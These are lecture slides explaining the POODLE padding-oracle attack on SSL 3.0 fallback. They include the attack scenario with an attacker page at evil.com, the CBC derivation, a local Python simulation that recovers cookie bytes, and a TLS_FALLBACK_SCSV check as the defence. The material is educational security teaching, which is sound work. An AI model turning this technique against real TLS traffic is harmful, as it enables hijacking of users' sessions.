POODLE
This POODLE Bites: Exploiting The SSL 3.0 Fallback
Bodo Möller, Thai Duong, Krzysztof Kotowicz
Presented By: Samit Anwer
Padding Oracle On Downgraded Legacy Encryption
• If an attacker interferes with a handshake offering TLS 1.0 or later, clients will downgrade to SSL 3.0
• Encryption in SSL 3.0 uses either the RC4 stream cipher or a block cipher (AES/DES) in CBC mode
• We will be taking a running example of AES in CBC mode of operation
• Assumption: the attacker can modify network transmissions between client and server
Attack Scenario
• Attacker sends link to victim (http://evil.com)
• When victim visits the link, the JavaScript embedded on evil.com starts making cookie-bearing requests to https://example.com
• An HTTP request looks like:
POST /path Cookie: name=value...\r\n\r\nbody
• The attacker can MITM the encrypted traffic and controls the data in “path” and “body”.
Cipher Block Chaining Encryption
Plaintext record: POST /path Cookie: name=value...\r\n\r\nbody ‖ 20-byte MAC ‖ padding
Plaintext blocks P1, P2, ..., Pi, ..., Pn-1, Pn are encrypted into ciphertext blocks C1, C2, ..., Ci, ..., Cn-1, Cn:
Ci = EK(Pi ⊕ Ci-1)
C0 = IV
AES block size is 16 bytes
DES block size is 8 bytes
Cipher Block Chaining Decryption
Pi = DK(Ci) ⊕ Ci-1
C0 = IV
Ciphertext blocks C1, C2, ..., Ci, ..., Cn-1, Cn decrypt back to P1, P2, ..., Pi, ..., Pn-1, Pn, i.e. the record:
POST /path Cookie: name=value...\r\n\r\nbody ‖ 20-byte MAC ‖ padding
The attack
POST /path Cookie: sessionid=value...\r\n\r\nbody ‖ 20-byte MAC ‖ padding
Padding of 1 to L bytes (where L is the block size in bytes) is added before performing blockwise CBC.
The attacker controls the request path and request body and hence can forge requests such that:
1. The padding fills an entire block (encrypted into Cn).
2. The cookie’s first (as yet unknown) byte appears as the final byte in an earlier block (which gets encrypted into Ci).
• The attacker replaces Cn by any earlier ciphertext block Ci
• The ciphertext will be accepted if DK(Ci) ⊕ Cn-1 happens to have 15 (L-1 for AES) as its final byte,
• otherwise, it will be rejected → giving rise to a padding oracle attack
Attack Contd.
From CBC decryption we know:
Pi = DK(Ci) ⊕ Ci-1
⇒ Pn = DK(Cn) ⊕ Cn-1
⇒ Pn[15] = DK(Cn)[15] ⊕ Cn-1[15] ----- (a)
After the substitution the server decrypts Ci in place of Cn, so it computes DK(Ci) ⊕ Cn-1 for the last block.
Assuming L=16 (AES) and the ciphertext gets accepted:
From (a): 15 = DK(Ci)[15] ⊕ Cn-1[15], which can be written as
=> DK(Ci)[15] = 15 ⊕ Cn-1[15] --------- (1)
We know: Pi = DK(Ci) ⊕ Ci-1
and hence Pi[15] = DK(Ci)[15] ⊕ Ci-1[15] --------- (2)
By replacing DK(Ci)[15] from (1) in (2) we get
Pi[15] = 15 ⊕ Cn-1[15] ⊕ Ci-1[15]
Unknown entity: Pi[15], the cookie byte. Known entities: Cn-1[15] and Ci-1[15], ciphertext bytes observed on the wire.
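The derivation above, replayed as an added simulation that is not part of the slides or the paper: victim, attacker and server all run in one process, a SHA-256 Feistel permutation stands in for AES (the leak depends only on CBC and the SSL 3.0 padding check, not on the cipher), and the cookie, keys and request layout are constructed sample values.

```python
import hashlib
import hmac
import os

BLOCK = 16      # L = 16, the AES block size assumed on the slides
MAC_LEN = 20    # the 20-byte MAC that precedes the padding

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

# Toy keyed permutation on 16-byte blocks (4-round Feistel over SHA-256), a
# stand-in for AES so the example needs only the standard library. The leak
# shown below is a property of CBC plus SSL 3.0 padding, not of the cipher.
def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def E(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, xor(l, _f(key, rnd, r))
    return l + r

def D(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = xor(r, _f(key, rnd, l)), l
    return l + r

def cbc_encrypt(key: bytes, iv: bytes, pt: bytes) -> bytes:
    out, prev = [], iv                      # C_i = E_K(P_i xor C_{i-1}), C_0 = IV
    for j in range(0, len(pt), BLOCK):
        prev = E(key, xor(pt[j:j + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = [], iv                      # P_i = D_K(C_i) xor C_{i-1}, C_0 = IV
    for j in range(0, len(ct), BLOCK):
        c = ct[j:j + BLOCK]
        out.append(xor(D(key, c), prev))
        prev = c
    return b"".join(out)

def mac(mac_key: bytes, seq: int, data: bytes) -> bytes:
    return hmac.new(mac_key, seq.to_bytes(8, "big") + data, hashlib.sha1).digest()

def ssl3_seal(key: bytes, mac_key: bytes, seq: int, data: bytes):
    """Sender: data || MAC || padding. SSL 3.0 padding bytes are arbitrary; only
    the last byte (the padding length, 0..L-1) means anything to the receiver."""
    body = data + mac(mac_key, seq, data)
    pad_len = BLOCK - 1 - len(body) % BLOCK          # a whole block when body is aligned
    body += os.urandom(pad_len) + bytes([pad_len])
    iv = os.urandom(BLOCK)                            # fresh chaining state per request
    return iv, cbc_encrypt(key, iv, body)

def ssl3_open(key: bytes, mac_key: bytes, seq: int, iv: bytes, ct: bytes) -> bool:
    """Receiver: the SSL 3.0 check. The length byte is only bounds-checked, the
    padding bytes are never inspected, and the MAC does not cover them."""
    pt = cbc_decrypt(key, iv, ct)
    pad_len = pt[-1]
    if pad_len >= BLOCK:
        return False
    body = pt[:len(pt) - pad_len - 1]
    data, tag = body[:-MAC_LEN], body[-MAC_LEN:]
    return hmac.compare_digest(tag, mac(mac_key, seq, data))

def recover_cookie_byte(k: int, cookie: bytes, key: bytes, mac_key: bytes):
    """Play victim, attacker and server locally for cookie byte k.
    Returns (recovered byte, number of requests the oracle needed)."""
    # Attacker-chosen path length puts cookie[k] at position 15 of block i
    prefix = b"A" * (BLOCK + (BLOCK - 1 - k) % BLOCK)
    i = (len(prefix) + k) // BLOCK + 1               # 1-based block index as on the slides
    # Attacker-chosen body length makes data || MAC block-aligned, so the
    # padding fills the whole final block C_n
    body = b"B" * (-(len(prefix) + len(cookie) + MAC_LEN) % BLOCK)
    data = prefix + cookie + body
    for attempts in range(1, 100_000):
        iv, ct = ssl3_seal(key, mac_key, attempts, data)      # victim re-sends the request
        blocks = [iv] + [ct[j:j + BLOCK] for j in range(0, len(ct), BLOCK)]  # C_0 .. C_n
        forged = ct[:-BLOCK] + blocks[i]                       # C_n replaced by C_i
        if ssl3_open(key, mac_key, attempts, iv, forged):
            # Accepted, so (D_K(C_i) xor C_{n-1})[15] == 15 and therefore
            # P_i[15] = 15 xor C_{n-1}[15] xor C_{i-1}[15]; every term is known
            return 15 ^ blocks[-2][15] ^ blocks[i - 1][15], attempts
    raise RuntimeError("oracle never accepted")

def recover_cookie(cookie: bytes, key: bytes, mac_key: bytes) -> bytes:
    """Recover all bytes; attempts average about 256 per byte."""
    return bytes(recover_cookie_byte(k, cookie, key, mac_key)[0] for k in range(len(cookie)))
```

The server's accept/reject verdict is the entire oracle, which is why the fix on the Recommendation slide removes SSL 3.0 from negotiation instead of patching the padding check.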
Overall Effort
• 256 SSL 3.0 requests per byte
Recommendation
• disabling the SSL 3.0 protocol in the client or in the server or both
• TLS_FALLBACK_SCSV
• When an incoming connection includes 0x56, 0x00 (TLS_FALLBACK_SCSV) in ClientHello.cipher_suites, compare ClientHello.client_version to the highest protocol version supported by the server. If the server supports a version higher than the one indicated by the client, reject the connection
Problem with SSL 3.0 in CBC mode:
The integrity of padding cannot be verified when decrypting as it is not covered by the MAC
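The TLS_FALLBACK_SCSV rule from the Recommendation slide, as an added example that is not from the slides or the paper: a minimal ClientHello builder and parser (handshake body only, no record layer or extensions, zeroed client random) and the server-side check, using the SSL 3.0/TLS version numbers and the inappropriate_fallback alert code from RFC 7507.

```python
import struct

TLS_FALLBACK_SCSV = 0x5600          # the 0x56, 0x00 value from the slide
INAPPROPRIATE_FALLBACK = 86         # RFC 7507 alert sent when the check fails
SSL_3_0, TLS_1_0, TLS_1_1, TLS_1_2 = 0x0300, 0x0301, 0x0302, 0x0303

def build_client_hello(client_version: int, cipher_suites: list) -> bytes:
    """Constructed ClientHello handshake message (no record layer, no extensions)."""
    body = struct.pack(">H", client_version)
    body += bytes(32)                                   # client random (zeros here)
    body += bytes([0])                                  # empty session_id
    suites = b"".join(struct.pack(">H", s) for s in cipher_suites)
    body += struct.pack(">H", len(suites)) + suites
    body += bytes([1, 0])                               # one compression method: null
    return bytes([1]) + len(body).to_bytes(3, "big") + body   # HandshakeType client_hello = 1

def parse_client_hello(msg: bytes):
    """Return (client_version, [cipher suites]) from a ClientHello handshake message."""
    if msg[0] != 1:
        raise ValueError("not a ClientHello")
    length = int.from_bytes(msg[1:4], "big")
    body = msg[4:4 + length]
    (client_version,) = struct.unpack(">H", body[:2])
    pos = 2 + 32                                        # skip client random
    pos += 1 + body[pos]                                # skip session_id
    (cs_len,) = struct.unpack(">H", body[pos:pos + 2])
    pos += 2
    suites = [struct.unpack(">H", body[j:j + 2])[0] for j in range(pos, pos + cs_len, 2)]
    return client_version, suites

def fallback_check(msg: bytes, server_max_version: int):
    """The server-side rule from the slide: SCSV present and client_version below
    the server's best version means the client was pushed down, so reject."""
    client_version, suites = parse_client_hello(msg)
    if TLS_FALLBACK_SCSV in suites and client_version < server_max_version:
        return "reject", INAPPROPRIATE_FALLBACK
    return "accept", None
```

A ClientHello that offers SSL 3.0 without the SCSV still passes this check, which is why the slide lists disabling SSL 3.0 as the first recommendation.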
Demo Overview
src: https://patzke.org/implementing-the-poodle-attack.html
Attack Steps:
• Degrade TLS protocol usage to SSLv3 by disruption of TLS handshake attempts.
• Adjust the URL and POST length such that the last block of the ciphertext is padding.
• Perform the copy operation on every generated TLS packet and calculate the leaked byte if the server accepts the modified packet.
References
• This POODLE Bites: Exploiting The SSL 3.0 Fallback, Bodo Möller, Thai Duong, Krzysztof Kotowicz, https://www.openssl.org/~bodo/ssl-poodle.pdf
• Attack of the week: POODLE, https://blog.cryptographyengineering.com/2014/10/15/attack-of-week-poodle/
• Implementing the POODLE Attack, https://patzke.org/implementing-the-poodle-attack.html

Editor's Notes

1. An initialization vector (IV) or starting variable (SV) is a block of bits that is used by several modes to randomize the encryption and hence to produce distinct ciphertexts even if the same plaintext is encrypted multiple times, without the need for a slower re-keying process.
2. Now observe that if there’s a full block of padding and an attacker replaces Cn by any earlier ciphertext block Ci from the same encrypted stream, the ciphertext will still be accepted if DK(Ci) ⊕ Cn-1 happens to have L-1 as its final byte, but will in all likelihood be rejected otherwise, giving rise to a padding oracle attack.